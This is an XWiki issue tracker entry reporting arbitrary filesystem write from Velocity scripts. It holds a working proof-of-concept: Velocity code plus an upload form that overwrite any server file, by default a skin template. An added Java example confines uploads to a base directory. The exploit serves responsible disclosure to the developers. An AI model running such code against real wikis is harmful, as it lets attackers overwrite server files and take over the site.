XWiki Platform: XWIKI-5168

Arbitrary filesystem write access from velocity.


    Details

    • Development Priority:
      Low
    • Difficulty:
      Medium
    • Documentation:
      N/A
    • Documentation in Release Notes:
      N/A
    • Pull Request Status:
      Awaiting Committer feedback

      Description

      This sample exploit abuses the file upload plugin but I reported this as a core bug because the problem is not constrained to the file upload plugin and I suspect I can find at least a half dozen other places where it manifests.

      The root of the problem is that the File class is too widely available and thus too much code is relied upon to keep the filesystem safe.

      The goods:

      {{velocity}}
      #if($request.getContentType().startsWith('multipart/'))
        #foreach($file in $xwiki.get('fileupload').getFileItems())
          #set($f = $file.getStoreLocation())
          #set($fi = $file)
        #end
        #set($f = $f.getAbsoluteFile())
        #foreach($part in $f.getCanonicalPath().split('/'))
          #set($path = $f.getParentFile())
        #end
        #set($newf = $f.getParentFile().getParentFile())
        #foreach($part in $request.getParameter('filename').split('/'))
          #if($part != '')
            #if($use != '')
              #set($use = '')
              #foreach($subf in $newf.listFiles())
                #if($subf.getName() == $part)
                  #set($use = $subf)
                #end
              #end
              #if($use != '')
                #set($newf = $use)
              #end
            #else
              Couldn't find the dir/file to write to ($part)
              #set($failed = 1)
            #end
          #end
        #end
        #if(!$failed && $newf.delete() && $fi.write($newf))
          == **Win!** ==
        #end
      #end
      {{html clean=false}}
      <form action="$doc.getURL("view")" enctype="multipart/form-data" method="post">
      <dl><dt>Where to save:</dt>
      <dd><input type="text" name="filename" value="/usr/local/jetty-6.1.3/webapps/xwikiTrunk/skins/colibri/view.vm" size="80"/></dd>
      <dt>What to save:</dt>
      <dd><input type="file" name="filepath" value="" size="40"/></dd>
      </dl>
      <input type="submit" value="Save!" class="button"/>
      </form>{{/html}}
      {{/velocity}}
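The containment check this class of bug calls for, as an added Java illustration (my own example, not XWiki's code or its actual fix for this issue): a store that resolves a request-supplied name against one fixed upload directory and refuses anything whose real path leaves it, so an absolute target like the view.vm path in the form above is rejected rather than written. The class and method names are assumptions.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

// Added example, not XWiki code: writes are confined to one base directory and
// no java.io.File or Path for an arbitrary location is ever handed to a caller.
public final class ConfinedUploadStore {
    private final Path base;

    public ConfinedUploadStore(Path base) throws IOException {
        // toRealPath() resolves symlinks so the containment check compares real paths
        this.base = base.toRealPath();
    }

    /** Resolve a caller-supplied name inside the base directory, or throw. */
    Path resolveInside(String requestedName) throws IOException {
        if (requestedName == null || requestedName.isEmpty()) {
            throw new IOException("empty file name");
        }
        Path requested = Paths.get(requestedName);
        // An absolute path would replace the base in resolve(), so refuse it outright
        if (requested.isAbsolute()) {
            throw new IOException("absolute paths are not allowed: " + requestedName);
        }
        // normalize() folds "." and ".." before the prefix check below
        Path target = base.resolve(requested).normalize();
        if (target.equals(base)) {
            throw new IOException("refusing to write over the upload directory");
        }
        // Compare the real path of the nearest existing ancestor, so a symlink
        // planted under the base cannot redirect the write elsewhere
        Path existing = target;
        while (existing != null && !Files.exists(existing)) {
            existing = existing.getParent();
        }
        if (existing == null || !existing.toRealPath().startsWith(base)) {
            throw new IOException("path escapes upload directory: " + requestedName);
        }
        return target;
    }

    public void store(String requestedName, byte[] content) throws IOException {
        Path target = resolveInside(requestedName);
        Files.createDirectories(target.getParent());
        Files.write(target, content);
    }
}
```

The same check applies to the script-facing API: scripts should receive only a name to pass to a store like this, never a File they can walk with getParentFile() and listFiles().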
      

People

Assignee: Simon Urli (surli)
Reporter: CalebJamesDeLisle (calebjamesdelisle)
Votes: 0
Watchers: 4
